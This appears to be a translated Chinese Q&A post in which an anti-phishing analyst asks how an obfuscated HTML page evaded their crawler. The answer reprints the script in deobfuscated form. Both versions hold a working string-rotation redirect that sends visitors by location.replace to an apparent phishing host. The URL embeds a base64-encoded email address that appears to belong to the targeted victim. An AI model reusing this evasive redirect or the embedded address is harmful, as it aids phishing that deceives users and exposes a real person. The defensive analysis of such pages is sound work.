问题描述
我在一家反网络钓鱼公司工作,我偶然发现了一个案例,它设法逃避了我们的 JCrawler,我试图理解代码以及攻击者在这里做了什么以保持不被发现,但无法弄清楚它真的得到了迷茫。
如何避免对此类网站的检测遗漏:
<!DOCTYPE html>
<html>
<title>Loading...</title>
<link rel="shortcut icon" href="favicon_a_eupayfgghqiai7k9sol6lg2.ico" />
<body>
<script>
var _0x117d=['4gSLXgI','2815VEHvFQ','14927VMrRFI','180751tIiKtp','11OWCNOZ','264810PhaCGI','49788ekTpju','https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQSEOEAXkZbuLZbhvqckbUQIUGexERLdh7sgiiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=','53294CAvUWH','289945bcwcUH','68GhmpuA','replace','15KaunFV'];
var _0x3d5f=function(_0x1853ca,_0x41286d){_0x1853ca=_0x1853ca-0x108;
var _0x117ddf=_0x117d[_0x1853ca];
return _0x117ddf;};
var _0x37e4a6=_0x3d5f;
(function(_0x5bb9bd,_0x286286){var _0xe278b9=_0x3d5f;
while(!![])
{try{var _0x2d8884=parseInt(_0xe278b9(0x10c))*-parseInt(_0xe278b9(0x111))+parseInt(_0xe278b9(0x10d))+-parseInt(_0xe278b9(0x112))*parseInt(_0xe278b9(0x10e))+-parseInt(_0xe278b9(0x109))+parseInt(_0xe278b9(0x113))*parseInt(_0xe278b9(0x110))+-parseInt(_0xe278b9(0x114))+parseInt(_0xe278b9(0x108))*parseInt(_0xe278b9(0x10a));
if(_0x2d8884===_0x286286)
break;
else _0x5bb9bd['push'](_0x5bb9bd['shift']());}
catch(_0x54c267){_0x5bb9bd['push'](_0x5bb9bd['shift']());}}}(_0x117d,0x339a1),location[_0x37e4a6(0x10f)](_0x37e4a6(0x10b)));
</script>
</body>
</html>
解决方法
这看起来有点像 JS 混淆器,对吧?
'use strict';
var _0x117d = ["4gSLXgI","2815VEHvFQ","14927VMrRFI","180751tIiKtp","11OWCNOZ","264810PhaCGI","49788ekTpju","https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQseoEAXkZbuLZbhvqckbUQIUGexERLdh7SGIiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=","53294CAvUWH","289945bcwcUH","68GhmPuA","replace","15KaunFV"];
var _0x3d5f = function _getCompositionValue(key,value) {
key = key - 264;
var value = _0x117d[key];
return value;
};
var _0x37e4a6 = _0x3d5f;
(function(data,oldPassword) {
var toMonths = _0x3d5f;
for (; !![];) {
try {
var userPsd = parseInt(toMonths(268)) * -parseInt(toMonths(273)) + parseInt(toMonths(269)) + -parseInt(toMonths(274)) * parseInt(toMonths(270)) + -parseInt(toMonths(265)) + parseInt(toMonths(275)) * parseInt(toMonths(272)) + -parseInt(toMonths(276)) + parseInt(toMonths(264)) * parseInt(toMonths(266));
if (userPsd === oldPassword) {
break;
} else {
data["push"](data["shift"]());
}
} catch (_0x54c267) {
data["push"](data["shift"]());
}
}
})(_0x117d,211361),location[_0x37e4a6(271)](_0x37e4a6(267));